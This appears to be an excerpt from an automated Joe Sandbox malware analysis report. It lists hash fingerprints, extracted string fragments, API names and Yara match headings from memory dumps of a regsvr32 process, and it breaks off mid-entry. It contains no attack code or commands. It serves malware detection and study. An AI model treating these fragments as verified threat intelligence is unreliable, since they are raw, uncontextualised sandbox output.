• Opcode Fuzzy Hash: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
• Instruction Fuzzy Hash: 5A41F27061CB848FD7A8DF28D58A65BBBF0FBD9704F805A1EE589C7250DB749804CB42
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: -+$0u$S$e!
• API String ID: 0-4217091389
• Opcode ID: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
• Instruction ID: 30ea3e3ea36e0ce89afa80e3a3390059829407905da68f89f0108f2b7409bfb9
• Opcode Fuzzy Hash: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
• Instruction Fuzzy Hash: 5941F3B090034A8FDB48CF64C88A5DE7FF0FB68388F20461DF81AA6250D37496A4CBD5
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 5`$<ml$a:$P
• API String ID: 0-330785107
• Opcode ID: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
• Instruction ID: 9e767be398b145fef4659a1bad9a67ace48f7b7104deef417815ffc7bd490679
• Opcode Fuzzy Hash: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
• Instruction Fuzzy Hash: 914104B190074E8BDB48DF68C48A49E7FB1FB58348F10861DE8569A390E7B89664CFC5
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: o$"B$SJ$wU
• API String ID: 0-691100934
• Opcode ID: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
• Instruction ID: 5a541b8f2f9017e4bb8e99fc93aaf3ad22d8c91e114aa7e22ecf66be9bc4a42a
• Opcode Fuzzy Hash: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
• Instruction Fuzzy Hash: 9D41F2B180078ECFDB48CF68C88A4DE7BF0FB58358F104619E859A6254D3B89695CFC5
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: 9luJ$=2y}$=2y}$b
• API String ID: 0-1667874806
• Opcode ID: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
• Instruction ID: aa57b421858d3e039772faab43d92329370059b3db58ab2cd4fb3fbdb0b4789a
• Opcode Fuzzy Hash: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
• Instruction Fuzzy Hash: E541D6B181038EDFDF44CF64D88A4CE7BB0FB18358F110A19F865A62A4D3B89665CF85
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: ;$O,$fdu
• API String ID: 0-1721916326
• Opcode ID: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
• Instruction ID: dd50258386073634785f4cfd19cfa09355625dbce358868bcb3742fd30161a2b
• Opcode Fuzzy Hash: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
• Instruction Fuzzy Hash: F3A115B0D14718EBDB58DFA8E8C999DBBF1FB54314F004219E816B72A0DB749985CF41
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: u$&v$f
• API String ID: 0-1868853588
• Opcode ID: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
• Instruction ID: 347e364158a0f1f00bc7207c674fe2a096c724371d0b6576a00a0b45a32f5a95
• Opcode Fuzzy Hash: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
• Instruction Fuzzy Hash: 90713471D04709ABCB1CDFA8E5D959DBBB1FB48314F10422DE816B72A0CB749A85CF81
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: o$j$t
• API String ID: 0-2067604139
• Opcode ID: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
• Instruction ID: 18649911257e17ad6fa255ef29938ff70901b48e77053c8ab8130b36b710e402
• Opcode Fuzzy Hash: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
• Instruction Fuzzy Hash: 6061DF715087848BD368DF28C18A55BBBF1FBC6704F104A1DF68A9B2A0D77AD944CB43
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: P$KGRa$wy
• API String ID: 0-4077564265
• Opcode ID: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
• Instruction ID: d621e202ffea213f0ea9af14c4edc95d019645cc49daeacb6dfe415558fc7184
• Opcode Fuzzy Hash: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
• Instruction Fuzzy Hash: B941C0B090074A8BDF48CF68C8865DE7FB0FB68348F55461DE84AA6290D37896A4CFC4
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: =$N@`Y$`Y
• API String ID: 0-2183226064
• Opcode ID: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
• Instruction ID: 5222e828b4b669c78658925fb0be058838b63d29e38bbf1f0f5c61d2cacdf583
• Opcode Fuzzy Hash: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
• Instruction Fuzzy Hash: D151C3B190074E8FDB44CF68C88A4DE7FB0FB68398F204619F856A6250D3B496A4CFD4
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: '0$~?$\
• API String ID: 0-629757258
• Opcode ID: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
• Instruction ID: cc6d517053a9e2603b12dfc9a0a13288b782b58b38ade8d63c2a336585f6af26
• Opcode Fuzzy Hash: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
• Instruction Fuzzy Hash: 8641CEB0548B808BE718CF28C59A51ABBF1FBC5344F604A2DF6968A3A0D775D885CF42
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: A7$z$~*b
• API String ID: 0-275545515
• Opcode ID: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
• Instruction ID: af5d65540fded4370c4e97112ddc4c2e82b1c3c3d4aac5ebe6f355ada8613144
• Opcode Fuzzy Hash: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
• Instruction Fuzzy Hash: ED41C4B180074ECFDB48CF64C48A5DE7FB0FB64398F204619E855A6290D3B896A9CFD5
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: H$rTk=${,%
                                                                                                  • API String ID: 0-3174111592
                                                                                                  • Opcode ID: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                  • Instruction ID: 148e704a8d16fd51d66fdab4448402af6282a671a822f8ce9a555cffecfbdb01
                                                                                                  • Opcode Fuzzy Hash: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                  • Instruction Fuzzy Hash: 6E31E9705287859BD798DF28C4C991EBBE1FBC4354F946A2CF482872A1D779D485CB03
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                  • String ID:
                                                                                                  • API String ID: 15204871-0
                                                                                                  • Opcode ID: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                  • Instruction ID: df89035e7e7b250386178c13d978bdab97caeca02fa44d79d4a04f1db2bf885c
                                                                                                  • Opcode Fuzzy Hash: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                  • Instruction Fuzzy Hash: BCB12C77610B888BEB56CF29C8463987BA0F348B88F15C915EB59877A8CF39C955CB01
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LinkObjectOpenSymbolic
                                                                                                  • String ID:
                                                                                                  • API String ID: 3706036087-0
                                                                                                  • Opcode ID: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                  • Instruction ID: f4502f775a5e45d64f420efd52fcf5a6929529857e1dcb94e78d5b08d8e8d060
                                                                                                  • Opcode Fuzzy Hash: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                  • Instruction Fuzzy Hash: 23E0C230B1896842F7EA96BAAC017AB1051A34D7C0F70D429BA02C80C0DCA9C3894704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D?"$8zfK
                                                                                                  • API String ID: 0-617590365
                                                                                                  • Opcode ID: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                                  • Instruction ID: 2e715f1e1404219753842cc207c7ae60c254710ac66bb562b807bb5d63ba87bf
                                                                                                  • Opcode Fuzzy Hash: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                                  • Instruction Fuzzy Hash: A71201B550560DCBDB68DF38C48A49E3BE1FF58308F205129FC269B2A2D774D964CB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #X$h}
                                                                                                  • API String ID: 0-3021649463
                                                                                                  • Opcode ID: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                  • Instruction ID: 76284c63707943ac2ce0d7e08acaa3b9ccef569434eacdc9f950646133b19762
                                                                                                  • Opcode Fuzzy Hash: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                  • Instruction Fuzzy Hash: E522AA709097888BEBF8DF24C8856D97BF0FF44704F90651ED84EAA690DB786685CF42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #X$+ <
                                                                                                  • API String ID: 0-1007305072
                                                                                                  • Opcode ID: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                  • Instruction ID: cd4b2295a8fd20270e418ebfa7c35920e6900d6d33520d35da4d55597ff4aa5a
                                                                                                  • Opcode Fuzzy Hash: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                  • Instruction Fuzzy Hash: D50278B5900709CFDB88CF68C58A5DD3BB9FB59308F404129FC1E9A2A0D3B4E919CB56
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Hc$aYG
                                                                                                  • API String ID: 0-2147329803
                                                                                                  • Opcode ID: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                  • Instruction ID: 5c75054948f33a10e49cb6c70a873caf62a5a18bdede66c10ed2c599f5359150
                                                                                                  • Opcode Fuzzy Hash: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                  • Instruction Fuzzy Hash: 81D1207560170DCBDB68CF28C58A5DE3BE9FF54308F104129FC1A962A5D7B8E829CB46
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Ip$2/
                                                                                                  • API String ID: 0-2558650176
                                                                                                  • Opcode ID: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                  • Instruction ID: d0396a94f986c2749e4f1416e6c4ab212fec6a00c7aadfaf3dd5a230886b5b57
                                                                                                  • Opcode Fuzzy Hash: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                  • Instruction Fuzzy Hash: 94E1C571505B888FEBB8DF24CC99BEB7BA0FB84306F10551AD84AEE290DB745685CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID: h$j-`
                                                                                                  • API String ID: 963392458-2572860821
                                                                                                  • Opcode ID: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                  • Instruction ID: 15ee7218ea82a19f3702cef7a5a8bd1304e97405b63536af0844e803a2e12657
                                                                                                  • Opcode Fuzzy Hash: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                  • Instruction Fuzzy Hash: 52C1F471904788CFDB6CDFA8C88A59DBBB1FB48308F20421DE916AB261DBB49845CF41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #z$UP
                                                                                                  • API String ID: 0-3609392360
                                                                                                  • Opcode ID: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                  • Instruction ID: cfd9aaa531578f3a3eb4de161ce4242589efbb27b652db38554ddff10e77df24
                                                                                                  • Opcode Fuzzy Hash: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                  • Instruction Fuzzy Hash: D0A13771904609DBDF58DFA8E4CA4DEBBB0FB64348F20411DE846A72A0DB749A95CFC1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: )bkr$z~
                                                                                                  • API String ID: 0-4035444816
                                                                                                  • Opcode ID: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                  • Instruction ID: 5c6004ead7f3b2ef84d0cf7bcedd18bdea0b681507af3adcdf45a28309e75696
                                                                                                  • Opcode Fuzzy Hash: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                  • Instruction Fuzzy Hash: BA8190711147888FEBB8CF28DC867D937A0FB45314F609119D88EDE292DF785A89DB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: aK>$NM
                                                                                                  • API String ID: 0-1076587397
                                                                                                  • Opcode ID: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                  • Instruction ID: 68d982b65b194f887011a25c73845f18d5b2cabad491485ee890907a541e4931
                                                                                                  • Opcode Fuzzy Hash: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                  • Instruction Fuzzy Hash: 05B144B590030DCFDB98CF28C18A58D7BB8FB55348F505129FC1E9A2A1E3B5E614CB56
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: GcX$cy5X
                                                                                                  • API String ID: 0-3427037236
                                                                                                  • Opcode ID: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                  • Instruction ID: 6b23261857cde3e742480a18002f94df3d5ab532efc8d324d466412f1852564b
                                                                                                  • Opcode Fuzzy Hash: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                  • Instruction Fuzzy Hash: A9A1D6B0148388CBEBBEDF34D89A6D93BA9FB44B04F504619E81E9E290DF745785CB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &$U
                                                                                                  • API String ID: 0-326847644
                                                                                                  • Opcode ID: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                  • Instruction ID: 5043e0eceef7ee3929e21507be3fd06dc3fb61d8c97af9a4330ff171ab4cb349
                                                                                                  • Opcode Fuzzy Hash: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                  • Instruction Fuzzy Hash: A09179B190038E8FDF48CF68D88A5DE7BB0FB14348F104A19FC66AA250D7B4D665CB94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: k' {$z5
                                                                                                  • API String ID: 0-3484172565
                                                                                                  • Opcode ID: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                  • Instruction ID: 8cdd41f3995b9a7098fa99300a06263b8372363138c7bf32d2a06b8b131216ca
                                                                                                  • Opcode Fuzzy Hash: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                  • Instruction Fuzzy Hash: 6E710571500749CFDB48DF24C88A5DA7BA1FB58348F114329FC8AAB2A0D778D994CBC4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$D
                                                                                                  • API String ID: 0-3309211938
                                                                                                  • Opcode ID: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                  • Instruction ID: dc43f961ea080cc5df3c00da5fbbf42113869f8b50e6549bd1aafd7a84a77a32
                                                                                                  • Opcode Fuzzy Hash: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                  • Instruction Fuzzy Hash: 2B51397052478D9BDB98CF28DC899993BE4FB05308F94626CFC46D7292C774D886CB41
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #T$(Pv0
                                                                                                  • API String ID: 0-2531358951
                                                                                                  • Opcode ID: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                  • Instruction ID: f97d72528163cec467560e2d381522c8c4dee6174accee03e0c2cc342f7ec8c7
                                                                                                  • Opcode Fuzzy Hash: 75b81112f69fa21036012adbd1b3eca6c2c2cdc881b6fb35e88803ec9910d9b1
                                                                                                  • Instruction Fuzzy Hash: 16511E7050070E8BDF58DF18C88A4DE3BA0FB6839CF251619EC4AA6294D378D995CFC5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$%9
                                                                                                  • API String ID: 0-3031553271
                                                                                                  • Opcode ID: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                  • Instruction ID: 7d5f6bc09293bc4bb85e2d886c2bc0c8632226bf1a06c4a8a1a74abd5842bf1d
                                                                                                  • Opcode Fuzzy Hash: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                  • Instruction Fuzzy Hash: 7441727061C7849BD798CF28C0C5A6FBAE1FB88354F90692EF486D7391C738C9848B42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: gd$s=z
                                                                                                  • API String ID: 0-3301279615
                                                                                                  • Opcode ID: 9e0a1eb710f150882f220fbe0277e01504bf60581961d70543420594e9a038f4
                                                                                                  • Instruction ID: f798d29dfb4f6f02cfda8123c7b93fe0204032a725e5f0463a8c80c067de4245
